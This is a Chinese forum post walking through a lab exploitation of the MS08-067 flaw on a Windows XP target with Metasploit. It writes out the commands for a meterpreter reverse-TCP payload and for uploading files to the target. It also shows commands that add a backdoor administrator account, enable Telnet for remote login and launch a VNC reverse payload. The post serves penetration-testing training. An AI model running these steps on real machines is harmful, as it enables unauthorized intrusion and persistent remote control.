用户
搜索
  • TA的每日心情
    开心
    昨天 07:36
  • 签到天数: 101 天

    连续签到: 101 天

    [LV.6]常住居民II

    i春秋-见习白帽

    Rank: 3Rank: 3

    44

    主题

    91

    帖子

    2578

    魔法币
    收听
    0
    粉丝
    4
    注册时间
    2020-10-2
    发表于 2021-5-23 17:32:20 03165
    本帖最后由 Johnson666 于 2021-5-23 17:34 编辑

    利用 ms08-067 漏洞入侵靶机(win xp2)并利用 meterpreter 进行深入渗透

    一、漏洞简介
    MS08-067 漏洞将会影响 Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的 Windows 7 Pro-Beta。如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。


    二、网络拓扑
    1.png


    三、实现步骤
    (1)首先确定 kali 为攻击机,windows xp2 为靶机(需打开 445 端口,默认为打开)。然后,在 kali 终端输入 msfconsole,启动 Metasploit 工具
    2.png


    (2)输入命令 search ms08_067,查找关于 ms08_067 的漏洞模块。

    3.png


    (3)输入如下命令,使用该漏洞模块
    4.png


    (4)进入这个模块后,用 show options 查看该模块需要配置的参数

    5.png

    (5)设置靶机 IP(xp2):
    [AppleScript] 纯文本查看 复制代码
    set RHOST 192.168.100.144

    设置要执行的 payload:
    [AppleScript] 纯文本查看 复制代码
    set payload windows/meterpreter/reverse_tcp

    设置攻击机的 IP(kali):
    [AppleScript] 纯文本查看 复制代码
    set LHOST 192.168.100.143

    设置要攻击的目标操作系统类型:
    [AppleScript] 纯文本查看 复制代码
    set target 10

    用 show options 查看相关参数是否配置正确

    6.png

    7.png

    8.png

    9.png

    10.png

    (6)最后,输入 exploit,回车运行,进入到特殊的 payload---meterpreter,该 payload 在控制靶机之后,能够对靶机执行更多的渗透攻击。用 pwd 查看靶机当前的工作路径,用 ipconfig 命令查看靶机的 IP 地址配置。

    11.png


    (7)通过 help 命令,可以查看在 Meterpreter 下可以使用的命令及功能简介

    12.png

    (8)输入 shell 命令进入 WINXP,并在 C 盘下创建一个文件夹

    13.png

    (9)按 CTRL+Z(或输入 exit),返回 meterpreter

    14.png

    (10)将 saminside 文件夹(该文件夹可以是任意文件夹)拷贝到 KALI 的 root用户下

    15.png


    (11)将 KALI 下的 saminside 文件夹使用 upload 命令上传到 windows xp 的C:/saminside 中

    16.png


    (12)在 XP 中查看已上传成功的文件(也可以通过该命令上传木马程序等)
    17.png


    (13)拿到 Windows XP 的控制权后,可以使用 Windows XP 系统自带的命令添加用户(用户 hacker 改为自己姓名拼音小写首字母,密码自己设置一个),将该用户添加到管理员组,让该用户具体管理员的权限;利用命令开启 Windows XP的 telnet 服务,用于远程登录 Windows XP。

    18.png


    net user hacker 123456 /add
    //以上使用 net 命令在 Windows XP 中添加了一个用户,名为:hacker,密码为:123456
    QQ图片20210523173130.png


    net localgroup administrators hacker /add
    //以上使用 net 命令,把 hacker 用户添加到 Administrators 管理员组中
    QQ图片20210523173134.png


    sc config tlntsvr start= auto
    //以上命令把 Telnet 服务从禁止,改为自动启动
    sc start tlntsvr //启动 Telnet 服务

    QQ图片20210523173137.png

    (14)在 Kali 上用命令 telnet 远程登录到 windows xp
    19.png


    (15)拿到 Windows XP 的控制权后可以对靶机进行控制,如在攻击机上输入shutdown –r: 关机。到靶机上可以看到关闭系统倒计时的窗口。


    20.png

    21.png

    (16)在攻击机上输入 shutdown –a:取消关机
    22.png

    (17)使用 VNC,远程控制靶机
    1background
    2set payload windows/vncinject/reverse_tcp
    3set viewonly no

    23.png

    24.png

    25.png

    26.png

    27.png

    发新帖
    您需要登录后才可以回帖 登录 | 立即注册